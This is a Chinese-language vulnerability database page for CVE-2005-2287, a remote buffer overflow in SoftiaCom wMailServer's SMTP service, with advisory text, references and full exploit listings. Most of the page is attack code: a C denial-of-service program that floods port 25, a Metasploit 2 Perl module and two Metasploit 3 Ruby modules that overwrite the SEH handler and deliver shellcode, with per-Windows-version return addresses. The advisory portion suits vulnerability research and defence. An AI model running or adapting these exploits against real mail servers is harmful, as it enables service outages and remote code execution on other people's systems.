CVE-2005-2287
CVSS5.0
发布时间 :2005-07-18 00:00:00
修订时间 :2016-10-17 23:25:59
NMCOEP    

[原文]SoftiaCom wMailServer 1.0 and 2.0 allows remote attackers to cause a denial of service (application crash) via a large TCP packet with a leading space, possibly triggering a buffer overflow.


[CNNVD]SoftiaCom wMailServer 拒绝服务漏洞(CNNVD-200507-200)

        Softiacom wMailserver是一款用于Win平台的邮件服务软件。
        SoftiaCom wMailServer 1.0及2.0版本中存在拒绝服务漏洞。
        远程攻击者可通过发送带有前导空格的大型TCP数据包(可能触发缓冲区溢出),导致应用程序崩溃,造成拒绝服务。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:softiacom:wmailserver:2.0
cpe:/a:softiacom:wmailserver:1.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2287
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2287
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200507-200
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=112122500308722&w=2
(UNKNOWN)  BUGTRAQ  20050712 SoftiaCom MailServer v2.0 - Denial Of Service

- 漏洞信息

SoftiaCom wMailServer 拒绝服务漏洞
中危 缓冲区溢出
2005-07-18 00:00:00 2005-10-20 00:00:00
远程  
        Softiacom wMailserver是一款用于Win平台的邮件服务软件。
        SoftiaCom wMailServer 1.0及2.0版本中存在拒绝服务漏洞。
        远程攻击者可通过发送带有前导空格的大型TCP数据包(可能触发缓冲区溢出),导致应用程序崩溃,造成拒绝服务。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.softiacom.com/

- 漏洞信息 (1101)

wMailServer 1.0 Remote Denial of Service Exploit (EDBID:1101)
windows dos
2005-07-12 Verified
0 Kozan
N/A [点击下载]
/*****************************************************************

wMailServer Remote D.o.S Exploit by Kozan

Application: wMailServer
Vendor: Softiacom Software - www.softiacom.com

Discovered by: fRoGGz - SecuBox Labs
Exploit Coded by: Kozan
Credits to ATmaCA, fRoGGz, SecuBox Labs
Web: www.spyinstructors.com
Mail: kozan@spyinstructors.com

*****************************************************************/

#include <winsock2.h>
#include <stdio.h>
#include <windows.h>

#pragma comment(lib,"ws2_32.lib")

/*
 * The data written to the SMTP port: 26 lines of 20 bytes plus one of 19,
 * i.e. 539 bytes of 0x41 ('A') with no terminator other than the implicit
 * NUL, matching the "approximately 539 characters" trigger described on
 * this page. Note that, unlike the CVE text and the later Metasploit
 * modules, this buffer has no leading space.
 */
char Buff[] =
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";

/*
 * Entry point. Opens a TCP connection to port 25 on argv[1], writes Buff
 * in a single send() without first reading the server banner, then
 * exits. Nothing is read back, so the program cannot observe whether the
 * service actually failed; it only reports whether the write succeeded.
 * From a monitoring standpoint the session is "client speaks first" on
 * SMTP with one ~539-byte write and no SMTP verb.
 *
 * Returns 0 on a completed write, -1 on usage or any Winsock failure.
 */
int main(int argc, char *argv[])
{
       fprintf(stdout, "wMailServer Remote D.o.S Exploit by Kozan\n");
       fprintf(stdout, "Discovered by: fRoGGz - SecuBox Labs\n");
       fprintf(stdout, "Exploit Coded by: Kozan\n");
       fprintf(stdout, "Credits to ATmaCA, fRoGGz, SecuBox Labs\n\n");
       fprintf(stdout, "www.spyinstructors.com - kozan@spyinstructors.com\n");

       if(argc<2)
       {
               fprintf(stderr, "\n\nUsage: %s [Target IP]\n\n", argv[0]);
               return -1;
       }
       WSADATA wsaData;
       SOCKET sock;

       /* 0x0101 requests Winsock 1.1. WSAStartup() returns 0 on success and
        * a positive error code on failure, so this "< 0" test can never be
        * true; the correct check is "!= 0". */
       if( WSAStartup(0x0101,&wsaData) < 0 )
       {
               fprintf(stderr, "Winsock error!\n");
               return -1;
       }

       /* SOCKET is unsigned; -1 converts to INVALID_SOCKET, so the comparison
        * is right in effect, though the named constant would be clearer. */
       sock = socket(AF_INET,SOCK_STREAM,0);
       if( sock == -1 )
       {
               fprintf(stderr, "Socket error!\n");
               return -1;
       }

       struct sockaddr_in addr;

       addr.sin_family = AF_INET;
       addr.sin_port = htons(25);   /* SMTP */
       /* inet_addr() yields INADDR_NONE for a malformed dotted quad; that is
        * not checked here, so a bad argv[1] only surfaces at connect(). */
       addr.sin_addr.s_addr = inet_addr(argv[1]);
       memset(&(addr.sin_zero), '\0', 8);

       /* sizeof(struct sockaddr) equals sizeof(struct sockaddr_in) (16), so the
        * length is correct. The error paths below return without WSACleanup();
        * process exit reclaims the Winsock state. */
       if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 )
       {
               fprintf(stderr, "Connection failed!\n");
               closesocket(sock);
               return -1;
       }

       /* One write of the whole buffer; strlen() excludes the terminating NUL,
        * so exactly 539 bytes go out. strlen() is used without <string.h> and
        * presumably arrives transitively via <windows.h> — confirm. send()
        * reports failure as SOCKET_ERROR, which is -1. */
       if( send(sock,Buff,strlen(Buff),0) == -1 )
       {
               fprintf(stderr, "DoS string could not sent!\n");
               closesocket(sock);
               return -1;
       }

       fprintf(stdout, "Operation completed...\n");
       closesocket(sock);
       WSACleanup();

       return 0;
}

// milw0rm.com [2005-07-12]
		

- 漏洞信息 (1463)

SoftiaCom WMailserver 1.0 SMTP Remote Buffer Overflow Exploit (meta) (EDBID:1463)
windows remote
2006-02-01 Verified
21 y0
N/A [点击下载]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::wmailserver_smtp;
use base "Msf::Exploit";
use strict;
use Pex::Text;

# Advanced options (none) and the module metadata consumed by the
# Metasploit 2.x framework through Msf::Exploit.
my $advanced = { };

my $info =
  {

	'Name'     => 'SoftiaCom WMailserver 1.0 SMTP Buffer Overflow',
	'Version'  => '$Revision: 1.1 $',
	'Authors'  => [ 'y0 [at] w00t-shell.net', ],
	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32', 'winnt', 'win2000', 'winxp' ],
	'Priv'  => 0,
	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 25],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
	  },
	'AutoOpts' => { 'EXITFUNC' => 'thread' },
	'Payload' =>
	  {
		'Space'     => 600,
		# Bytes the payload encoder must not emit: NUL, LF, CR, space,
		# and the ':' '=' '+' '"' delimiters.
		'BadChars'  => "\x00\x0a\x0d\x20:=+\x22",
		# x86 stack adjustment placed before the payload:
		# 81 c4 ff ef ff ff = add esp,-0x1001 ; 44 = inc esp.
		'Prepend'   => "\x81\xc4\xff\xef\xff\xff\x44",
		'Keys'      => ['+ws2ord'],
	  },

	'Description'  => Pex::Text::Freeform(qq{
	This module exploits a stack overflow in SoftiaCom WMailserver 1.0 (SMTP)
	via a SEH frame overwrite.
}),

	'Refs'  =>
	  [
		# "CAN-" is the old candidate prefix for what is now CVE-2005-2287.
		['CVE', 'CAN-2005-2287'],
		['BID', '14213'],
	  ],
	# Per-OS address written over the SEH handler pointer (see Exploit()).
	'Targets' =>
	  [
		['Windows NT 4.0 English SP4/SP5/SP6', 0x776a1799],
		['Windows 2000 English ALL', 0x75022ac4],
		['Windows XP English SP0/SP1', 0x71aa32ad],
	  ],
	'Keys' => ['smtp'],
  };

# Constructor: hands $info/$advanced to the Msf::Exploit base class and
# forwards any remaining arguments unchanged.
sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

# Builds and sends the overflow string, then waits on the payload handler.
# Wire layout: a leading space (as in the CVE description), 5117 uppercase
# filler bytes, a 2-byte short jump, the 4-byte per-target SEH handler
# address, the encoded payload, and CRLFCRLF — sent as the first bytes of
# the session, before any SMTP verb. Returns nothing; errors are printed.
sub Exploit
{
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target = $self->Targets->[$target_idx];

	if (! $self->InitNops(128)) {
		$self->PrintLine("[*] Failed to initialize the nop module.");
		return;
	}

	# 5117 bytes of uppercase filler; with the leading space this places
	# the handler address at offset 5120.
	my $splat  = Pex::Text::UpperCaseText(5117);

	# "\xeb\x06" is jmp +6: it skips the 4-byte handler address that
	# follows and lands in the payload. pack('V') is little-endian 32-bit.
	my $sploit =
	  " ". $splat. "\xeb\x06". pack('V', $target->[1]).
	  $shellcode. "\r\n\r\n";

	$self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));

	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );
	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	# Single write; nothing is read from the server first.
	$s->Send($sploit);
	$self->Handler($s);
	$s->Close();
	return;
}

1;  # a Perl module file must end with a true value

# milw0rm.com [2006-02-01]
		

- 漏洞信息 (16819)

SoftiaCom WMailserver 1.0 Buffer Overflow (EDBID:16819)
windows remote
2010-05-09 Verified
25 metasploit
N/A [点击下载]
##
# $Id: wmailserver.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Metasploit 3 port of the WMailserver SMTP overflow (EDB 16819). On the
# wire the module sends a single line that starts with a space, continues
# with roughly 5k uppercase letters plus the SEH record and payload, and
# ends with CRLFCRLF — as the first bytes of the session, before any SMTP
# verb and without reading the banner.
class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	# Module metadata: references, payload constraints and the two per-OS
	# return addresses written over the SEH handler pointer.
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'SoftiaCom WMailserver 1.0 Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0
				(SMTP) via a SEH frame overwrite.
			},
			'Author'         => [ 'MC' ],
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2005-2287' ],
					[ 'OSVDB', '17883' ],
					[ 'BID', '14213' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Platform'       => 'win',
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 600,
					# Bytes the encoder must not emit: NUL, LF, CR, space.
					'BadChars' => "\x00\x0a\x0d\x20",
					# x86 stack adjustment run before the payload:
					# 81 c4 ff ef ff ff = add esp,-0x1001 ; 44 = inc esp.
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Targets'        =>
				[
					[ 'Windows 2000 Pro English All',   		{ 'Ret' => 0x75022ac4 } ],
					[ 'Windows XP Pro SP0/SP1 English', 		{ 'Ret' => 0x71aa32ad } ],
				],
			'DefaultTarget'  => 0,
			# NOTE(review): the date string carries a trailing space.
			'DisclosureDate' => 'Jul 11 2005 '))

		register_options([ Opt::RPORT(25) ], self.class)
	end

	# Connects, sends filler + SEH record + trailing padding in one write,
	# then hands the socket to the payload handler and disconnects.
	def exploit
		connect

		# Leading space as in the CVE description, then 5115 uppercase bytes.
		# The Perl port on this page uses 5117 — presumably because
		# generate_seh_payload() emits a 4-byte next-SEH jump where that
		# version hand-rolls 2 bytes, leaving the handler address at the
		# same offset; confirm against the Seh mixin.
		filler = " " + rand_text_alpha_upper(5115)
		seh = generate_seh_payload(target.ret)
		sploit = filler + seh + rand_text_alpha_upper(200)

		print_status("Trying target #{target.name}...")
		sock.put(sploit + "\r\n\r\n")

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83132)

SoftiaCom WMailserver 1.0 Buffer Overflow (PacketStormID:F83132)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow
CVE-2005-2287
[点击下载]

This Metasploit module exploits a stack overflow in SoftiaCom WMailserver 1.0 (SMTP) via a SEH frame overwrite.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


# Earlier revision of the same Metasploit 3 module (PacketStorm F83132);
# it differs from the EDB 16819 copy only in whitespace, the unexpanded
# $Id$/$Revision$ keywords and the absence of a Rank. Wire behaviour is
# identical: one space-prefixed line of uppercase filler, SEH record and
# payload, terminated by CRLFCRLF, sent before any SMTP verb.
class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	# Module metadata: references, payload constraints and the two per-OS
	# return addresses written over the SEH handler pointer.
	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'SoftiaCom WMailserver 1.0 Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in SoftiaCom WMailserver 1.0
				(SMTP) via a SEH frame overwrite.	
			},
			'Author'         => [ 'MC' ],
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-2287' ],
					[ 'OSVDB', '17883' ],
					[ 'BID', '14213' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Platform'       => 'win',
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 600,
					# Bytes the encoder must not emit: NUL, LF, CR, space.
					'BadChars' => "\x00\x0a\x0d\x20",
					# x86 stack adjustment run before the payload:
					# 81 c4 ff ef ff ff = add esp,-0x1001 ; 44 = inc esp.
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Targets'        => 
				[
					[ 'Windows 2000 Pro English All',   		{ 'Ret' => 0x75022ac4 } ],
					[ 'Windows XP Pro SP0/SP1 English', 		{ 'Ret' => 0x71aa32ad } ],
				],
			'DefaultTarget'  => 0,
			# NOTE(review): the date string carries a trailing space.
			'DisclosureDate' => 'Jul 11 2005 '))

			# Indented one level deeper than the call above; cosmetic only.
			register_options([ Opt::RPORT(25) ], self.class)
	end

	# Connects, sends filler + SEH record + trailing padding in one write,
	# then hands the socket to the payload handler and disconnects.
	def exploit
		connect
	
		# Leading space as in the CVE description, then 5115 uppercase bytes;
		# generate_seh_payload() presumably supplies the next-SEH jump and
		# handler address itself — confirm against the Seh mixin.
		filler = " " + rand_text_alpha_upper(5115)
		seh = generate_seh_payload(target.ret)
		sploit = filler + seh + rand_text_alpha_upper(200) 
	
		print_status("Trying target #{target.name}...")	
		sock.put(sploit + "\r\n\r\n")
		
		handler
		disconnect
	end

end
    

- 漏洞信息

17883
wMailserver SMTP Service Remote Overflow DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

wMailserver contains a flaw that may allow a remote denial of service. The issue is triggered when approximately 539 characters are sent to the SMTP service, and results in a loss of availability for the service.

- 时间线

2005-07-12 Unknown
Unknown Unknown

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 
